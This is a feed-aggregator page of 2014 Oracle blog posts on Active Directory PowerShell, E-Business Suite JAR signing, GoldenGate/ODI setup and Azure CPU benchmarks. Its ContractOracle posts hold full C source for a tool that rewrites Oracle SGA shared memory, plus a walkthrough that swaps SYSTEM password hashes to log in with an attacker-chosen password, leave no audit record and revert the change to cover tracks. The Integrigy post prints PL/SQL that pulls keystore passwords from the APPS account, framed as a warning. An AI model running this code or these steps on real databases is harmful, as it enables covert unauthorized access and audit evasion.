Skip navigation.

Feed aggregator

powershell goodies for Active Directory

Laurent Schneider - Fri, 2014-07-11 07:04

What are my groups?


PS> Get-ADPrincipalGroupMembership lsc |
      select -ExpandProperty "name"
Domain Users
oracle
sybase

Who is member of that group ?

PS> Get-ADGroupMember oracle| 
      select -ExpandProperty "name"
Laurent Schneider
Alfred E. Newmann
Scott Tiger

What is my phone number ?

PS> (get-aduser lsc -property MobilePhone).MobilePhone
+41 792134020

This works like a charm on your Windows 7 PC.
1) Download and install Remote Server Administration Tools
2) Activate the windows feature under control panel program called “Active Directory Module for Powershell”
3) PS> Import-Module ActiveDirectory
Read the procedure there : how to add active directory module in powershell in windows 7

Oracle E-Business Suite Security - Signed JAR Files - What Should You Do – Part II

In our blog post on 16-May, we provided guidance on Java JAR signing for the E-Business Suite. We are continuing our research on E-Business Suite Java JAR signing and will be presenting it in a forthcoming educational webinar. Until then we would like to share a few items of importance based on recent client conversations -

  • Apply latest patches - The latest patches for Oracle E-Business Suite JAR signing are noted in 1591073.1. There are separate patches for 11i, 12.0.x, 12.1.x and 12.2.x. To fully take advantage of the security features provided by signing JAR files the latest patches need to be applied.
  • Do not use the default Keystore passwords - Before you sign your JAR files change the keystore passwords.  The initial instructions in 1591073.1 note that a possible first step before you start the JAR signing process is to change the keystore passwords. Integrigy recommends that changing the keystore passwords should be mandatory. The default Oracle passwords should not be used. Follow the instructions in Appendix A of 1591073.1 to change both keystore passwords. Each password must be at least six (6) characters in length. If you have already signed your JAR files, after changing the keystore passwords you must create a new keystore and redo all the steps in 1591073.1 to create a new signed certificate (it is much easier to change the keystore passwords BEFORE you sign your JAR files).
  • The keystore passwords are available to anyone with the APPS password - Using the code below anyone with the APPS password can extract the keystore passwords. Ensure that this fact is allowed for in your polices for segregation of duties, keystore management and certificate security.

SQL> set serveroutput on
declare 
spass varchar2(30); 
kpass varchar2(30); 
begin 
ad_jar.get_jripasswords(spass, kpass); 
dbms_output.put_line(spass); 
dbms_output.put_line(kpass); 
end; 
/

This will output the passwords in the following order:

store password (spass) 
key password (kpass)

If you have questions, please contact us at info@integrigy.com

References Tags: Security Strategy and StandardsOracle E-Business Suite
Categories: APPS Blogs, Security Blogs

How to directly update Oracle password hashes in SGA while avoiding DB security and audit.

ContractOracle - Fri, 2014-07-11 03:22
My previous blog posts showed it was possible to directly update table data in the SGA and bypass audit and database level security.    The following example expands on that to show how to modify password hashes in the SGA to allow connection to the database without changing passwords in datafiles.

Basically we updated the password hashes in SGA to known values for user SYSTEM using the following 3 commands :-

./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC

./sga_data_replace 5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0 319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179


./sga_data_replace 076F596A5F2AD47593407D24734BF6C0 E30710ABA2D3492243C239A8854B4E21


Output from the DB side is as follows.

First generate a set of password hashes for user SYSTEM with password "badguy".

CDB$ROOT@ORCL> alter user system identified by badguy;

User altered.


CDB$ROOT@ORCL> select password, spare4 from user$ where name = 'SYSTEM';

PASSWORD
--------------------------------------------------------------------------------
SPARE4
--------------------------------------------------------------------------------
E235D5FC5165F1EC
S:319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179;H:E30710ABA2D3492243C239A8854B4E21

Next find the password hashes that need to be replaced.  Below we use sqlplus to extract them from user$, but we could also read them directly from datafile or SGA without logging into the database.

CDB$ROOT@ORCL> alter user system identified by goodguy;

User altered.

CDB$ROOT@ORCL> select password, spare4 from user$ where name = 'SYSTEM';

PASSWORD
--------------------------------------------------------------------------------
SPARE4
--------------------------------------------------------------------------------
09F3A178C7F6F650
S:5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0;H:076F596A5F2AD47593407D24734BF6C0

Demonstrate login using the "goodguy" password.

CDB$ROOT@ORCL> connect system/goodguy;
Connected.

Now replace the password hashes in SGA with the known password hashes for password "badguy".

./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC

./sga_data_replace 5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0 319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179


./sga_data_replace 076F596A5F2AD47593407D24734BF6C0 E30710ABA2D3492243C239A8854B4E21


And test to confirm that we can now login using password "badguy".

CDB$ROOT@ORCL> connect system/badguy;
Connected.

This shows that the password hash values in SGA were updated, and the database did not crash, or detect the data change, and allowed direct login with the modified hashes.  Since the change was only made to data in memory, there is no audit record, and no evidence in datafiles (unless a transaction updates the modified blocks and commits them back to disk).  It would also be possible to back-out the changes made to SGA to the original hash values to cover up completely.
Sample output from the first SGA update command above follows :-
[oracle@localhost shared_memory]$ ./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC


WARNING WARNING WARNING

This program may crash or corrupt your Oracle database!!! It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. Anyone may copy or modify the code provided.

USAGE :- sga_data_replace searchstring replacestring

Number of input parameters seem correct.Length of search parameter 09F3A178C7F6F650 matches replace parameter E235D5FC5165F1ECThis program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.SEARCH FOR   :- 09F3A178C7F6F650REPLACE WITH :- E235D5FC5165F1ECEnter Y to continue :- Y/dev/shm/ora_orcl_20381697_76 replace string at 2099160replace 0 with Ereplace 9 with 2replace F with 3replace 3 with 5replace A with Dreplace 1 with 5replace 7 with Freplace 8 with Creplace C with 5replace 7 with 1replace F with 6replace 6 with 5replace F with Freplace 6 with 1replace 5 with Ereplace 0 with C/dev/shm/ora_orcl_20381697_76 replace string at 2271972replace 0 with Ereplace 9 with 2replace F with 3replace 3 with 5replace A with Dreplace 1 with 5replace 7 with Freplace 8 with Creplace C with 5replace 7 with 1replace F with 6replace 6 with 5replace F with Freplace 6 with 1replace 5 with Ereplace 0 with C/dev/shm/ora_orcl_20381697_76 replace string at 2320344replace 0 with Ereplace 9 with 2replace F with 3replace 3 with 5replace A with Dreplace 1 with 5replace 7 with Freplace 8 with Creplace C with 5replace 7 with 1replace F with 6replace 6 with 5replace F with Freplace 6 with 1replace 5 with Ereplace 0 with C/dev/shm/ora_orcl_20381697_75 replace string at 994020replace 0 with Ereplace 9 with 2replace F with 3replace 3 with 5replace A with Dreplace 1 with 5replace 7 with Freplace 8 with Creplace C with 5replace 7 with 1replace F with 6replace 6 with 5replace F with Freplace 6 with 1replace 5 with Ereplace 0 with C/dev/shm/ora_orcl_20381697_68 replace string at 2624228replace 0 with Ereplace 9 with 2replace F with 3replace 3 with 5replace A with Dreplace 1 with 5replace 7 with Freplace 8 with Creplace C with 5replace 7 with 1replace F with 6replace 6 with 5replace F with Freplace 6 with 1replace 5 with Ereplace 0 with C/dev/shm/ora_orcl_20381697_37 replace string at 450614replace 0 with Ereplace 9 with 2replace F with 3replace 3 with 5replace A with Dreplace 1 with 5replace 7 with Freplace 8 with Creplace C with 5replace 7 with 1replace F with 6replace 6 with 5replace F with Freplace 6 with 1replace 5 with Ereplace 0 with C/dev/shm/ora_orcl_20381697_35 replace string at 695886replace 0 with Ereplace 9 with 2replace F with 3replace 3 with 5replace A with Dreplace 1 with 5replace 7 with Freplace 8 with Creplace C with 5replace 7 with 1replace F with 6replace 6 with 5replace F with Freplace 6 with 1replace 5 with Ereplace 0 with CError: File is empty, nothing to do
Categories: DBA Blogs

C program to find/replace data in Oracle SGA.

ContractOracle - Fri, 2014-07-11 02:49
Following is a proof of concept program to change data in Oracle shared memory mapped to /dev/shm
It uses shm_open and mmap to cleanly open and close the existing shared files, search for a string, and replace it.   I have tested it on Linux against Oracle 12C databases, changing data in SGA without crashing the database, but it should also work against 11g.  It won't work against Oracle versions prior to 11g as they manage shared memory in a different manner (Sample program here ).

I am happy for anyone to copy and/or modify this code, but be aware that this program has the potential to crash or corrupt any database on the server where it is run.  Sample output can be found here.

To compile it on Linux :-

gcc sga_data_replace.c -o sga_data_replace -lrt

Note that this blog may strip out some symbols, so if you have issues compiling please check syntax (especially in the include section).

[oracle@localhost shared_memory]$ more sga_data_replace.c
#include stdio.h
#include stdlib.h
#include ctype.h
#include dirent.h
#include string.h
#include unistd.h
#include sys/file.h
#include sys/mman.h

replace_sga(char search_string[],char replace_string[])
{
  DIR           *d;
  struct dirent *dir;
  char *data;
  char *memname;
  int i,j;
  int search_length = strlen(search_string);
  int replace_length = strlen(replace_string);
  d = opendir("/dev/shm");

  if (d)
  {
    while ((dir = readdir(d)) != NULL)
    {
      memname = dir->d_name;
      if (strstr(memname,"ora"))
      {
        //printf("Opening %s\n",memname);
        int fd = shm_open(memname, O_RDWR, 0660);

        if (fd == -1)
        {
          perror("Error opening file for reading");
          exit(EXIT_FAILURE);
        }

        struct stat fileInfo = {0};

        if (fstat(fd, &fileInfo) == -1)
        {
          perror("Error getting the file size");
          exit(EXIT_FAILURE);
        }

        if (fileInfo.st_size == 0)
        {
          fprintf(stderr, "Error: File is empty, nothing to do\n");
          exit(EXIT_FAILURE);
        }

        data = mmap(0, fileInfo.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);

        if (data == MAP_FAILED)
        {
          close(fd);
          perror("Error mmapping the file");
          exit(EXIT_FAILURE);
        }

        for (i = 0; i < fileInfo.st_size; i++)
        {
          for (j = 0; j < replace_length; j++)
          {
            if (data[i+j] != search_string[j])
              break;
          }

          if (j==replace_length)
          {
            printf("/dev/shm/%s replace string at %d\n",memname,i);
            for (j = 0; j < replace_length; j++)
            {
              printf("replace %c with %c\n",data[i+j],replace_string[j]);
              data[i+j] = replace_string[j];                  
            }
          }
        }
        close(fd);
      }
    }
  }
  closedir(d);
}

int main(int argc, char *argv[])
{
printf("\n\n\nWARNING WARNING WARNING\n\n\n");
printf("This program may crash or corrupt your Oracle database!!! ");
printf("It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. ");
printf("Anyone may copy or modify the code provided.\n\n\n");
printf("USAGE :- sga_data_replace \n\n\n");

  if (argc == 3 && strlen(argv[1]) == strlen(argv[2]))
  {
    printf("Number of input parameters seem correct.\n");
    printf("Length of search parameter %s matches replace parameter %s\n",argv[1],argv[2]);
    printf("This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.\n");
    printf("SEARCH FOR   :- %s\n",argv[1]);
    printf("REPLACE WITH :- %s\n",argv[2]);
    printf("Enter Y to continue :- ");

    char    user_input;
    scanf("  %c", &user_input );
    user_input = toupper( user_input );
    if(user_input == 'Y')
    {
      replace_sga(argv[1],argv[2]);
    }
  }
  else
  {
    printf("The program expects two parameters the same number of characters.\n");
  }
  return 0;
}

Categories: DBA Blogs

Sample output from program to update data in Oracle shared memory.

ContractOracle - Fri, 2014-07-11 02:45
Following is an example of updating Oracle data in shared memory.

From the database side we can see that only the data in SGA was changed, and the data on disk remained untouched.  (verified by flushing the buffer cache and forcing a re-read from disk)


CDB$ROOT@ORCL> create table test (text char(6));

Table created.

CDB$ROOT@ORCL> insert into test values ('vendor');

1 row created.

CDB$ROOT@ORCL> commit;

Commit complete.

CDB$ROOT@ORCL> select * from test;

TEXT
------
badguy

CDB$ROOT@ORCL> alter system flush buffer_cache;

System altered.

CDB$ROOT@ORCL> select * from test;

TEXT
------
vendor



Following is sample output from my program to update data in Oracle shared memory.  In this case it connected to every shared memory file in /dev/shm and replaced all strings "vendor" with "badguy".

[oracle@localhost shared_memory]$ ./sga_data_replace vendor badguy



WARNING WARNING WARNING


This program may crash or corrupt your Oracle database!!! It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. Anyone may copy or modify the code provided.


USAGE :- sga_data_replace searchstring replacestring


Number of input parameters seem correct.
Length of search parameter vendor matches replace parameter badguy
This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.
SEARCH FOR   :- vendor
REPLACE WITH :- badguy
Enter Y to continue :- Y
/dev/shm/ora_orcl_20381697_91 replace string at 366592
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_82 replace string at 3238216
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_75 replace string at 2230653
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_73 replace string at 1361711
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_73 replace string at 1361718
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_62 replace string at 1081334
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
Error: File is empty, nothing to do

Categories: DBA Blogs

GoldenGate and Oracle Data Integrator – A Perfect Match in 12c… Part 4: Start Journalizing!

Rittman Mead Consulting - Thu, 2014-07-10 15:26

In this post, the finale of the four-part series “GoldenGate and Oracle Data Integrator – A Perfect Match in 12c”, I’ll walk through the setup of the ODI Models and start journalizing in “online” mode. This will utilize our customized JKM to build the GoldenGate parameter files based on the ODI Metadata and deploy them to both the source and target GoldenGate installation locations. Before I get into all of the details, let’s recap the first 3 posts and see how we arrived at this point.

Part one of the series, Getting Started, led us through a quick review of the Oracle Reference Architecture for Information Management and the tasks we’re trying to accomplish; loading both the Raw Data Reservoir (RDR) and Foundation schemas simultaneously, using Oracle GoldenGate 12c replication, and set it all up via Oracle Data Integrator 12c. We also reviewed the setup of the GoldenGate JAgent process, necessary for communication between ODI and GoldenGate when using the “online” version of the Journalizing Knowledge Module.

In part two, we reviewed the Journalizing Knowledge Module, “JKM Oracle to Oracle Consistent (OGG Online)”, its new features, and how much it has been improved in ODI 12c. Full integration with Oracle GoldenGate, through the use of the new ODI Tool “OdiOggCommand”, allows for the setup and configuration of GoldenGate process groups, trail file directories, and table-level supplemental logging, all from the ODI JKM.

Most recently, part 3, titled Setup Journalizing, walked us through the customizations of the “JKM Oracle to Oracle Consistent (OGG Online)” that will allow us to create the source-to-foundation replication alongside the standard source-to-RDR setup. We added a set of options, the first to control whether or not we replicat to foundation and the second to capture the ODI Logical Schema corresponding to the foundation schema. Then we added the task that will create the source-to-foundation table mapping inside the GoldenGate replicat parameter file and set the options appropriately. I’ve been using the ODI 12c Getting Started VM, with the 12.1.2 version of ODI, for my demo setup. If you haven’t done so already, you can download the latest version of the VM, with ODI 12.1.3, from the Oracle Technical Network. I’d say that’s enough recap, now on to the final steps for GoldenGate and ODI 12c integration and let’s start journalizing!

Setup ODI Models Create Models

We first need to create the ODI Models and Datastores for the Source, Staging (Raw Data Reservoir) and Foundation tables. I will typically reverse engineer the source tables into a Model first, then copy them to the Staging and Foundation Models. This approach will ensure the column names and data types remain consistent with the source. I then execute a Groovy script to create the additional data warehouse audit columns in each of the Foundation Datastores.

models

Configure JKM

Unlike the 11g version of ODI, in 12c the “JKM Oracle to Oracle Consistent (OGG Online)” Knowledge Module will be set on the source Model. Open up the Model, in this example, PM_SRC, and switch to the Journalizing tab.

model-journalizing

We’ll set the Journalizing Mode to “Consistent Set” and then choose the customized JKM that we have been working with in this example, “JKM Oracle to Oracle Consistent (OGG Online) RM”, from the dropdown list. Now we are presented with the GoldenGate Process Selection parameters and a list of KM Options to configure.

Set the Process Selection parameters for the Capture Process and Delivery Process by selecting the Logical Schemas created in Part 3 - Setup GoldenGate Topology – Schemas. This setting drives the naming of the Extract, Pump, and Replicat parameter files and process groups in GoldenGate. If you plan to use GoldenGate for the initial load, select the processes here as well. I’m not setting mine, as I typically use a batch load tool, such as Oracle Datapump or insert across DBLink to perform the initial load of the target. As you can see in the image below, you can also create the Oracle GoldenGate Logical Schemas from the Model.

model-jkm-process

Next are the set of Options, including the 2 new Options added in the previous post. We can leave several of the values as the default, as they are specific to particular character sets or implementation on a multi-node Oracle RAC setup.

model-jkm-options

The Options we do want to set:

ONLINE - Set to “true” to enable the automatic GoldenGate configuration when Start Journal is run.
LOCAL_TEMP_DIR – Enter a directory local to the machine on which the Start Journal process will be executed. Be sure the user executing the Start Journal process has privileges to create/modify/remove directories and files.
APPLY_FOUNDATION – Custom Option, set to “true” to enable the addition of the source-to-foundation mapping to the GoldenGate Replicat parameter file.
FND_LSCHEMA – The Logical Schema for the Foundation layer, necessary when APPLY_FOUNDATION is true.

After the Options are set, the Model can be saved and closed. Back in the Designer Navigator, add the Datastores to CDC by either selecting each individual Datastore and adding it or by right-clicking the Model and choosing to add the entire set all at once.

model-add-to-cdc

Before we get on with using the JKM, there is one thing I forgot to mention in the previous post. When setting up the Logical Schema for the GoldenGate “Delivery” process, you must also set the target Logical Schema. If you fail to do so, you’ll get an error stating “SnpLSchema does not exist” when attempting any Change Data Capture commands on the source Model.

logical-schema-set-target

With the JKM set and the tables added to Change Data Capture, we can now add a Subscriber. Subscribers allow multiple mappings to consume the change data from the J$ tables at different intervals. For example, a table may be consumed by one mapping every hour, and then by an additional mapping each night. Two different Subscribers would be used in this case. In our example, I’ll create a single Subscriber named “PERFECT_MATCH”. Make sure the process runs successfully, then it’s time to start Journalizing.

Start Capturing Changes

With the setup and configuration out of the way, the rest is up to the JKM. We’re now able to right-click the source Model and select Change Data Capture–>Start Journal. This executes all of the Start Journal related steps in the JKM, which will create the CDC Framework (J$ tables, JV$ views, etc.), generate and deploy the GoldenGate parameter files (Extract, Pump, and Replicat), and configure and start the GoldenGate process groups. Be sure that the source and target GoldenGate Manager and JAgent processes are running prior to executing the Start Journal process. Also, make sure that the database is in ArchiveLog mode and ready for GoldenGate to capture transactions.

After the Start Journal process is successfully completed, you can browse to the source GoldenGate home directory, run GGSCI, and view the status of the OGG process groups.

ogg-src-info-all

It looks like the Extract and Pump are in place and running. Now let’s check out the Replicat on the target GoldenGate installation.

ogg-trg-info-all

Here we see that the Replicat process is in place, but not actually running. Remember from our JKM editing that we commented out the step that will start the Replicat process. This is to ensure we perform an initial load prior to applying any captured change data to the target.

The last bit of work that must be completed is the initial load. I won’t go into details here, but the way I like to do it is to load the source to the target data based on a captured SCN using Oracle Datapump or DBLink rather than using GoldenGate process groups to perform the load. Note: The ODI 12c Getting Started Guide doesn’t even use the OGG initial load! Then, we can start the replicat in GoldenGate after the captured SCN using the same approach I wrote about in a previous blog on ODI and GoldenGate 11g.

JKM “Online” Mode

Beyond adding the parameter files and process groups, what exactly did the “online” version of the JKM do for us? If you browse to the directory that we set in the JKM Options under LOCAL_TEMP_DIR, you’ll find all of the GoldenGate files generated by the JKM. These files were generated locally, then uploaded to their proper GoldenGate home directory. Without “online” mode, they would had to have been manually copied to GoldenGate.

jkm-steps

Once uploaded, the obey files (batch files for GoldenGate commands) were executed.

OdiOggCommand "-LSCHEMA=EXTPMSRC" "-OPERATION=EXECUTEOBEY" "-OBEY_FILE=/home/oracle/Oracle/Middleware/oggsrc/EXTPMSRC.oby"

And finally, JKM steps were generated to perform the creation of the process groups in GoldenGate.

OdiOggCommand "-LSCHEMA=EXTPMSRC" "-OPERATION=EXECUTECMD"
add extract EXTPMSRC, tranlog, begin now 
add exttrail /home/oracle/Oracle/Middleware/oggsrc/dirdat/oc, extract EXTPMSRC, megabytes 100
stop extract EXTPMSRC
start extract

If you ever need to stop the change data capture process, either to add additional tables or make modifications to the metadata, you can run the Drop Journal process. Not only will the CDC Framework of tables and views be removed, but the “online” mode also reaches into GoldenGate and drops the process groups that were generated by the JKM.

OdiOggCommand "-LSCHEMA=EXTPMSRC" "-OPERATION=EXECUTECMD"
stop extract RPMEDWP
delete extract RPMEDWP

In conclusion, the integration between GoldenGate and Oracle Data Integrator  in 12c has been vastly improved over the 11g version. The ability to manage the entire setup process from within ODI is a big step forward, and I can only see these two products being further integrated in future releases. If you have any questions or comments about ODI or GoldenGate, or would like some help with your own implementation, feel free to add a comment below or reach out to me at michael.rainey@rittmanmead.com.

 

Categories: BI & Warehousing

Oracle Priority Service Infogram for 10-JUL-2014

Oracle Infogram - Thu, 2014-07-10 15:09

RDBMS
A Tale of Session Parameter Settings, an oldie but goodie from one of our favorite bloggers, DBA Kevlar.
From the ORACLE-BASE Blog: Invoker Rights in Oracle Database 12c : Some more articles.
In-Memory Option
Oracle In-Memory Option: 6 Key Points, from InformationWeek.
Certification
Upgrade Your OCA Certification to a Current Version of OCP With a Streamlined Path, from Oracle Certification.
SOA
From Oracle SOA Suite Components: Human Workflow.
Top 10 Most Popular OTN SOA Articles, from ArchBeat.
Java
From The Aquarium: Spotlight on GlassFish 4.0.1 : #1 JDBC Realm
Programming
Seven Things You Should Never Code Yourself, from New Relic.
10 Essential Sublime Text Plugins for Full Stack Developers, from Sitepoint.
Hadoop
From the Oracle A-Team Chronicles: Importing Data from SQL databases into Hadoop with Sqoop and Oracle Data Integrator (ODI)
WebLogic
Additional new material WebLogic Community, from the WebLogic Partner Community EMEA blog.
A freee eCourse: WebLogic Server 12c (12.1.3) New Features.
OAM
From Pythian: Differences Between R12.1 and R12.2 Integration with OAM.
Coherence
Coherence Adapter Configuration, from Antony Reynolds' Blog.
Business
From Forbes: Why Today's Enterprise Social Strategies Won't Work Tomorrow
From ICS: Simplifying IT to Drive Better Business Outcomes and Improved ROI: Introducing the IT Complexity Index.
EBS
From the Oracle E-Business Suite Support Blog:
Learn About Troubleshooting Reports & Printing Issues
How to Find E-Business Suite & E-Business Suite Technology Stack Patches
HCM: Introducing the 'HCM Person Analyzer' for EBS Human Capital Management
Your Payables #1 Document Keeps Getting Better!!
Webcast: How To Use E-Business Tax Simulator

Installing OEL 6 and Database 12c

Hemant K Chitale - Thu, 2014-07-10 08:25
Here is a collection of posts on installing (a) Virtual Box (b) Oracle Enterprise Linux 6 (c) 12c Grid Infrastructure (Standalone, non-Clustered) and ASM (d) 12c Database with CDB and PDB.
.
.
.

Categories: DBA Blogs

Comparing CPU Throughput of Azure and AWS EC2

Pythian Group - Thu, 2014-07-10 08:11

After observing CPU core sharing with Amazon Web Services EC2, I thought it would be interesting to see if Microsoft Azure platform exhibits the same behavior.

Signing up for Azure’s 30-day trial gives $200 in credit to use over the next 30-day period: more than enough for this kind of testing. Creating a new virtual machine, using the “quick create” option with Oracle Linux, and choosing a 4-core “A3″ standard instance.

I must say I like the machine naming into built-in “clouadpp.net” DNS that Azure uses: no mucking around with IP addresses. The VM provisioning definitely takes longer than AWS, though no more than a few minutes. And speaking of IP addresses, both start with 191.236. addresses assigned to Microsoft’s Brazilian subsidiary through the Latin American LACNIC registry, due to the lack of north american IP addresses.

Checking out the CPU specs as reported to the OS:

[azureuser@marc-cpu ~]$ egrep '(processor|model name|cpu MHz|physical id|siblings|core id|cpu cores)' /proc/cpuinfo
processor       : 0
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.990
physical id     : 0
siblings        : 4
core id         : 0
cpu cores       : 4
processor       : 1
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.990
physical id     : 0
siblings        : 4
core id         : 1
cpu cores       : 4
processor       : 2
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.990
physical id     : 0
siblings        : 4
core id         : 2
cpu cores       : 4
processor       : 3
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.990
physical id     : 0
siblings        : 4
core id         : 3
cpu cores       : 4

2.2GHz rather than 2.6GHz, but otherwise the same family and architecture as the E5-2670 under AWS. Identified as a single-socket, 4-core processor, without hyperthreads at all.

Running the tests
[azureuser@marc-cpu ~]$ taskset -pc 0 $$
pid 1588's current affinity list: 0-3
pid 1588's new affinity list: 0
[azureuser@marc-cpu ~]$ dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null
2170552320 bytes (2.2 GB) copied, 36.9319 s, 58.8 MB/s
[azureuser@marc-cpu ~]$ for i in {1..2}; do (dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null &) done
2170552320 bytes (2.2 GB) copied, 72.8379 s, 29.8 MB/s
2170552320 bytes (2.2 GB) copied, 73.6173 s, 29.5 MB/s

Pretty low; that’s half the throughput we saw on AWS, albeit with a slower clock speed here.

[azureuser@marc-cpu ~]$ taskset -pc 0,1 $$
pid 1588's current affinity list: 0
pid 1588's new affinity list: 0,1
[azureuser@marc-cpu ~]$ for i in {1..2}; do (dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null &) done
[azureuser@marc-cpu ~]$ 2170552320 bytes (2.2 GB) copied, 36.4285 s, 59.6 MB/s
2170552320 bytes (2.2 GB) copied, 36.7957 s, 59.0 MB/s

[azureuser@marc-cpu ~]$ taskset -pc 0,2 $$
pid 1588's current affinity list: 0,1
pid 1588's new affinity list: 0,2
[azureuser@marc-cpu ~]$ for i in {1..2}; do (dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null &) done
[azureuser@marc-cpu ~]$ 2170552320 bytes (2.2 GB) copied, 36.3998 s, 59.6 MB/s
2170552320 bytes (2.2 GB) copied, 36.776 s, 59.0 MB/s

Pretty consistent results, so no core sharing, but running considerably slower than we saw with AWS.

Kicking off 20 runs in a rows:

[azureuser@marc-cpu ~]$ taskset -pc 0-3 $$
pid 1588's current affinity list: 0,2
pid 1588's new affinity list: 0-3
[azureuser@marc-cpu ~]$ for run in {1..20}; do
>  for i in {1..2}; do dd if=/dev/zero bs=1M count=2070 2>> output | gzip -c > /dev/null & done
> wait
> done
...
[azureuser@marc-cpu ~]$ cat output | awk '/copied/ {print $8}' | sort | uniq -c
      1 59.1
      4 59.2
      1 59.3
      2 59.4
      2 59.5
      8 59.6
     12 59.7
      7 59.8
      3 59.9

We get very consistent results, between 59.1 and 59.9 mB/sec

Results from “top” while running:

cat > ~/.toprc <<-EOF
RCfile for "top with windows"           # shameless braggin'
Id:a, Mode_altscr=0, Mode_irixps=1, Delay_time=3.000, Curwin=0
Def     fieldscur=AEHIOQTWKNMbcdfgjplrsuvyzX
        winflags=25913, sortindx=10, maxtasks=2
        summclr=1, msgsclr=1, headclr=3, taskclr=1
Job     fieldscur=ABcefgjlrstuvyzMKNHIWOPQDX
        winflags=62777, sortindx=0, maxtasks=0
        summclr=6, msgsclr=6, headclr=7, taskclr=6
Mem     fieldscur=ANOPQRSTUVbcdefgjlmyzWHIKX
        winflags=62777, sortindx=13, maxtasks=0
        summclr=5, msgsclr=5, headclr=4, taskclr=5
Usr     fieldscur=ABDECGfhijlopqrstuvyzMKNWX
        winflags=62777, sortindx=4, maxtasks=0
        summclr=3, msgsclr=3, headclr=2, taskclr=3
EOF
[azureuser@marc-cpu ~]$  top -b -n20 -U azureuser
...
top - 14:38:41 up 2 min,  2 users,  load average: 2.27, 0.78, 0.28
Tasks: 205 total,   3 running, 202 sleeping,   0 stopped,   0 zombie
Cpu0  : 95.4%us,  4.6%sy,  0.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu1  :  0.0%us,  0.0%sy,  0.0%ni,100.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu2  : 94.4%us,  5.1%sy,  0.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.5%si,  0.0%st
Cpu3  :  0.0%us,  0.3%sy,  0.0%ni, 99.7%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
 1606 azureuse  20   0  4292  800  400 R 97.0  0.0   0:03.49 gzip
 1604 azureuse  20   0  4292  796  400 R 96.7  0.0   0:03.50 gzip

top - 14:38:44 up 2 min,  2 users,  load average: 2.25, 0.80, 0.29
Tasks: 205 total,   3 running, 202 sleeping,   0 stopped,   0 zombie
Cpu0  : 94.4%us,  5.1%sy,  0.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.5%si,  0.0%st
Cpu1  :  0.0%us,  0.0%sy,  0.0%ni,100.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu2  : 72.3%us,  3.9%sy,  0.0%ni, 23.4%id,  0.0%wa,  0.0%hi,  0.4%si,  0.0%st
Cpu3  : 12.0%us,  0.7%sy,  0.0%ni, 85.6%id,  1.4%wa,  0.0%hi,  0.4%si,  0.0%st

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
 1604 azureuse  20   0  4292  796  400 R 96.8  0.0   0:06.42 gzip
 1606 azureuse  20   0  4292  800  400 R 96.4  0.0   0:06.40 gzip

top - 14:38:47 up 2 min,  2 users,  load average: 2.25, 0.80, 0.29
Tasks: 205 total,   3 running, 202 sleeping,   0 stopped,   0 zombie
Cpu0  : 94.9%us,  5.1%sy,  0.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu1  :  9.7%us,  0.3%sy,  0.0%ni, 89.7%id,  0.0%wa,  0.0%hi,  0.3%si,  0.0%st
Cpu2  : 51.8%us,  2.8%sy,  0.0%ni, 45.4%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu3  : 17.9%us,  1.4%sy,  0.0%ni, 80.6%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
 1604 azureuse  20   0  4292  796  400 R 96.5  0.0   0:09.34 gzip
 1606 azureuse  20   0  4292  800  400 R 95.5  0.0   0:09.29 gzip

It’s using full CPUs and all from gzip, so no large system overhead here. Also, “%st”, time reported “stolen” by the hypervisor, is zero. We’re simply getting half the throughput of AWS.

Basic instances

